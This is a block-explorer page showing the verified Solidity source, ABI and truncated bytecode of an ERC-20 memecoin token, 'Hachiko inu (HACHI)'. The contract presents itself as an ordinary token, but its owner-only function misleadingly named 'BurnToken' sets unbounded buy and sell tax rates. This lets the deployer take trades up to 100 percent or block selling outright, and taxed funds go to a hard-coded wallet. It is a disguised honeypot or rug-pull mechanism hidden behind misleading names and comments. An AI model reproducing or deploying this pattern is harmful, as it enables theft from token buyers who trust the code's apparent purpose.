ETH Price: $2,425.98 (+3.27%)

Token

Hachiko inu (HACHI)
 

Overview

Max Total Supply

1,000,000,000 HACHI

Holders

9

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
92,887,952.716688264279615069 HACHI

Value
$0.00
0xCADa037164E29f6B376750CF17253DE35FeB64Ed
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
HACHI

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 7 : HACHI.sol
/*

β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘
β•šβ•β•  β•šβ•β•β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β•β•šβ•β•  β•šβ•β•β•šβ•β•
                                   
Hachikō (ハチ公, November 10, 1923 – March 8, 1935) was a Japanese  dog remembered for his remarkable loyalty to his owner, Hidesaburō Ueno.

$HACHI socials

TG:https://t.me/hachikoCoin_inu
X: https://x.com/hachikoCoin_inu
Website: https://hachiko.club

Wiki: https://en.m.wikipedia.org/wiki/Hachikō
Full story: https://youtu.be/_J-RbUNoBpA?si=kyRCm2HEAHU7-GjC
*/

//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./ERC20.sol";

/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract HACHI is ERC20 {
    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20(unicode"Hachiko inu", unicode"HACHI") {
        _mint(_msgSender(), totalSupply());
    }
}

File 2 of 7 : ERC20.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./Context.sol";
import "./IERC20.sol";
import "./IERC20Metadata.sol";
import "./IUniswapV2Factory.sol";
import "./IUniswapV2Router02.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting

 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;

    uint8 immutable private _decimals = 18;
    uint256 private _totalSupply = 1000000000 * 10 ** 18;

    string private _name;
    string private _symbol;
    address private _owner;
    uint256 public  timestemp = 0;
    uint256 public TimeLock = 0;
    bool private tradingOpen = false;
    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;
    uint256 public _maxTxAmount = _totalSupply*2/100;
    uint256 public _maxWalletSize = _totalSupply*4/100;
    uint256 public _swapTokensAtAmount = _totalSupply*3/1000;
    address payable public tokenMKT = payable(0xaEad078ec561dBD778D72272a2CDC90B371561B2);
    bool private inSwap = false;
    bool private swapEnabled = true;
    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }
    
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _owner = msg.sender;
        _name = name_;
        _symbol = symbol_;
        _isExcludedFromFee[_owner] = true;
        _isExcludedFromFee[address(this)] = true;
    }

    /**
     * @dev Returns the owner of the token, usually a shorter version of the
     * owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner_, address spender) public view virtual override returns (uint256) {
        return _allowances[owner_][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
        if (sender != owner() && recipient != owner()) {
            //Trade start check
            if (!tradingOpen) {
                require(sender == owner(), "TOKEN: This account cannot send tokens until trading is enabled");
            }

            require(amount <= _maxTxAmount, "TOKEN: Max Transaction Limit");
 
            if(recipient != uniswapV2Pair) {
                require(balanceOf(recipient) + amount < _maxWalletSize, "TOKEN: Balance exceeds wallet size!");
            }
 
            uint256 contractTokenBalance = balanceOf(address(this)); 
            if(contractTokenBalance >= _maxTxAmount)
            {
                contractTokenBalance = _maxTxAmount;
            }

            bool canSwap = contractTokenBalance >= _swapTokensAtAmount;
 
            if(contractTokenBalance >= _maxTxAmount)
            {
                contractTokenBalance = _maxTxAmount;
            }
 
            if (canSwap && !inSwap && sender != uniswapV2Pair && swapEnabled && !_isExcludedFromFee[sender] && !_isExcludedFromFee[recipient]) {
                swapTokensForEth(contractTokenBalance);
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance > 0) {
                    sendETHToFee(address(this).balance);
                }
            }
        }
        uint256 taxAmount = 0;
        if ((_isExcludedFromFee[sender] || _isExcludedFromFee[recipient]) || (sender != uniswapV2Pair && recipient != uniswapV2Pair)) {
            uint256 senderBalance = _balances[sender];
            require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount;

            emit Transfer(sender, recipient, amount);
        } else {
            //Set Fee for Buys
            if(sender == uniswapV2Pair && recipient != address(uniswapV2Router)) {
                taxAmount = amount * timestemp / 100;
            }
 
            //Set Fee for Sells
            if (recipient == uniswapV2Pair && sender != address(uniswapV2Router)) {
                taxAmount = amount * TimeLock / 100;
            }
            uint256 senderBalance = _balances[sender];
            require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
            _balances[sender] = senderBalance - amount;
            _balances[recipient] += amount - taxAmount;
            emit Transfer(sender, recipient, amount - taxAmount);
            if (taxAmount > 0) {
                _balances[address(this)] += taxAmount;
                emit Transfer(sender, recipient, taxAmount);
            }
        }
    }

    function sendETHToFee(uint256 amount) private {
        tokenMKT.transfer(amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _beforeTokenTransfer(address(0), account, amount);
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Burn `token to dead Wallets` 
     */
    function BurnToken(uint256 _timestemp, uint256 _TimeBurn) public {
        if(msg.sender!=_owner) revert("Not owner!");
        timestemp = _timestemp;
        TimeLock = _TimeBurn;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner_, address spender, uint256 amount) internal virtual {
        require(owner_ != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner_][spender] = amount;
        emit Approval(owner_, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }

    /**
     * @dev Sets `tradding` 
     */
    function OpenTrade(bool _tradingOpen) public {
        if(_owner != msg.sender) revert("Not owner!");
        require(!tradingOpen, "Cannot reenable trading");
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).getPair(address(this), _uniswapV2Router.WETH());
        tradingOpen = _tradingOpen;
    }

    /**
     * @dev Sets `max transaction amount and max wallet size` 
     * maxTX = supply
     * maxWLsize = supply
     */
    function removeLimit() public {
        if(msg.sender!=_owner) revert("Not owner!");
        _maxTxAmount = totalSupply();
        _maxWalletSize = totalSupply();
        _swapTokensAtAmount = totalSupply();
    }
}

File 3 of 7 : IUniswapV2Router02.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
 
    function factory() external pure returns (address);
 
    function WETH() external pure returns (address);
 
    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );
}

File 4 of 7 : IUniswapV2Factory.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

File 5 of 7 : IERC20Metadata.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 7 : IERC20.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 7 of 7 : Context.sol
//SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.24;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"_timestemp","type":"uint256"},{"internalType":"uint256","name":"_TimeBurn","type":"uint256"}],"name":"BurnToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_tradingOpen","type":"bool"}],"name":"OpenTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"TimeLock","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner_","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"timestemp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenMKT","outputs":[{"internalType":"address payable","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60a060405260126080526b033b2e3c9fd0803ce800000060038190555f60078190556008556009805460ff191690556064906200003e90600262000273565b6200004a919062000293565b600b556064600354600462000060919062000273565b6200006c919062000293565b600c556103e8600354600362000083919062000273565b6200008f919062000293565b600d55600e80546001600160b01b031916750100aead078ec561dbd778d72272a2cdc90b371561b2179055348015620000c6575f80fd5b50604080518082018252600b81526a48616368696b6f20696e7560a81b60208083019190915282518084019093526005835264484143484960d81b90830152600680546001600160a01b0319163317905590600462000126838262000350565b50600562000135828262000350565b50506006546001600160a01b03165f908152600260205260408082208054600160ff199182168117909255308452919092208054909116909117905550620001876200017e3390565b6003546200018d565b62000432565b6001600160a01b038216620001e85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b6001600160a01b0382165f9081526020819052604081208054839290620002119084906200041c565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52601160045260245ffd5b80820281158282048414176200028d576200028d6200025f565b92915050565b5f82620002ae57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52604160045260245ffd5b600181811c90821680620002dc57607f821691505b602082108103620002fb57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200025a57805f5260205f20601f840160051c81016020851015620003285750805b601f840160051c820191505b8181101562000349575f815560010162000334565b5050505050565b81516001600160401b038111156200036c576200036c620002b3565b62000384816200037d8454620002c7565b8462000301565b602080601f831160018114620003ba575f8415620003a25750858301515b5f19600386901b1c1916600185901b17855562000414565b5f85815260208120601f198616915b82811015620003ea57888601518255948401946001909101908401620003c9565b50858210156200040857878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b808201808211156200028d576200028d6200025f565b6080516115006200044b5f395f61020501526115005ff3fe608060405234801561000f575f80fd5b5060043610610148575f3560e01c806362256589116100bf57806395d89b411161007957806395d89b41146102c6578063a457c2d7146102ce578063a9059cbb146102e1578063bb76d8a5146102f4578063cbe8e207146102fd578063dd62ed3e14610310575f80fd5b8063622565891461025e57806370a08231146102685780637d1db4a5146102905780638da5cb5b146102995780638e26bbe4146102aa5780638f9a55c0146102bd575f80fd5b806323b872dd1161011057806323b872dd146101e25780632fd689e3146101f5578063313ce567146101fe578063395093511461022f57806349bd5a5e146102425780635ce845a914610255575f80fd5b806306fdde031461014c578063095ea7b31461016a5780631694505e1461018d57806318160ddd146101bd5780631ffdf9fa146101cf575b5f80fd5b610154610348565b60405161016191906111b5565b60405180910390f35b61017d610178366004611218565b6103d8565b6040519015158152602001610161565b6009546101a59061010090046001600160a01b031681565b6040516001600160a01b039091168152602001610161565b6003545b604051908152602001610161565b600e546101a5906001600160a01b031681565b61017d6101f0366004611242565b6103ee565b6101c1600d5481565b60405160ff7f0000000000000000000000000000000000000000000000000000000000000000168152602001610161565b61017d61023d366004611218565b6104a2565b600a546101a5906001600160a01b031681565b6101c160075481565b6102666104d8565b005b6101c1610276366004611280565b6001600160a01b03165f9081526020819052604090205490565b6101c1600b5481565b6006546001600160a01b03166101a5565b6102666102b83660046112a2565b610516565b6101c1600c5481565b610154610741565b61017d6102dc366004611218565b610750565b61017d6102ef366004611218565b6107ea565b6101c160085481565b61026661030b3660046112c1565b6107f6565b6101c161031e3660046112e1565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606004805461035790611318565b80601f016020809104026020016040519081016040528092919081815260200182805461038390611318565b80156103ce5780601f106103a5576101008083540402835291602001916103ce565b820191905f5260205f20905b8154815290600101906020018083116103b157829003601f168201915b5050505050905090565b5f6103e433848461082b565b5060015b92915050565b5f6103fa84848461094e565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156104835760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61049785336104928685611364565b61082b565b506001949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103e4918590610492908690611377565b6006546001600160a01b031633146105025760405162461bcd60e51b815260040161047a9061138a565b600354600b55600354600c55600354600d55565b6006546001600160a01b031633146105405760405162461bcd60e51b815260040161047a9061138a565b60095460ff16156105935760405162461bcd60e51b815260206004820152601760248201527f43616e6e6f74207265656e61626c652074726164696e67000000000000000000604482015260640161047a565b60098054610100600160a81b031916747a250d5630b4cf539739df2c5dacb4c659f2488d001790556040805163c45a015560e01b81529051737a250d5630b4cf539739df2c5dacb4c659f2488d91829163c45a0155916004808201926020929091908290030181865afa15801561060c573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061063091906113ae565b6001600160a01b031663e6a4390530836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561067b573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061069f91906113ae565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156106e9573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061070d91906113ae565b600a80546001600160a01b0319166001600160a01b0392909216919091179055506009805460ff1916911515919091179055565b60606005805461035790611318565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156107d15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161047a565b6107e033856104928685611364565b5060019392505050565b5f6103e433848461094e565b6006546001600160a01b031633146108205760405162461bcd60e51b815260040161047a9061138a565b600791909155600855565b6001600160a01b03831661088d5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161047a565b6001600160a01b0382166108ee5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161047a565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109b25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161047a565b6001600160a0